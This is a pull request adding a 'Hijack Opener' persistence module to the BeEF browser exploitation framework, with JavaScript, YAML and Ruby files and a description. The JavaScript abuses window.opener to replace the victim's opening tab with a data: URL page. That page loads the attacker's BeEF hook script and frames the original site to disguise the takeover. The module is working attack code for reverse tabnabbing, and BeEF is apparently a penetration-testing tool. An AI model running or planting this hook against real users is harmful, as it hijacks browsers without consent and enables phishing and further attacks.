### PR TITLE
Add Hijack Opener module

### DIFF
--- a/modules/persistence/hijack_opener/command.js
+++ b/modules/persistence/hijack_opener/command.js
@@ -1,0 +1,18 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var referrer = document.referrer;
+  var hook = beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+beef.net.hook;
+  try {
+    beef.debug("[Hijack Opener] Trying to hijack: " + referrer);
+    window.opener.location = 'data:text/html,<html><head><title>'+referrer+'</title><script src="'+hook+'"></'+'script><style>body {padding:0;margin:0}</style></head><body><iframe src="'+referrer+'" style="width:100%;height:100%;margin:0;padding:0;border:0"></iframe></body>';
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=hijacked window.opener.location", beef.are.status_success());
+  } catch (e) {
+    beef.debug("[Hijack Opener] could not hijack opener window: "+e.message)
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not hijack opener window: " + e.message, beef.are.status_error());
+  }
+});

--- a/modules/persistence/hijack_opener/config.yaml
+++ b/modules/persistence/hijack_opener/config.yaml
@@ -1,0 +1,16 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        hijack_opener:
+            enable: true
+            category: "Persistence"
+            name: "Hijack Opener Window"
+            description: "This module abuses window.location.opener to hijack the opening window, replacing it with a BeEF hook and 100% * 100% iframe containing the referring web page. Note that the iframe will be blank if the origin makes use of a restrictive X-Frame-Origin directive.<br/><br/>This attack will only work if the opener did not make use of the <i>noopener</i> and <i>noreferrer</i> directives. Refer to <a href='https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/'>Target=_blank - the most underestimated vulnerability ever</a> for more information."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]

--- a/modules/persistence/hijack_opener/module.rb
+++ b/modules/persistence/hijack_opener/module.rb
@@ -1,0 +1,10 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Hijack_opener < BeEF::Core::Command
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end


### PR DESCRIPTION
 This module abuses `window.location.opener` to hijack the opening window, replacing it with a BeEF hook and 100% * 100% iframe containing the referring web page.

Note that the iframe will be blank if the origin makes use of a restrictive `X-Frame-Origin directive`.

This attack will only work if the opener did not make use of the `noopener` and `noreferrer` directives. Refer to [Target="_blank" - the most underestimated vulnerability ever](https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/) for more information.

This module only works on Firefox for the moment out of sheer laziness, as only Firefox supports loading script contact from `data` URLs. There's no reason this module couldn't be updated to work with all modern browsers by dynamically generating the landing page server-side then redirecting the referrer to this page.
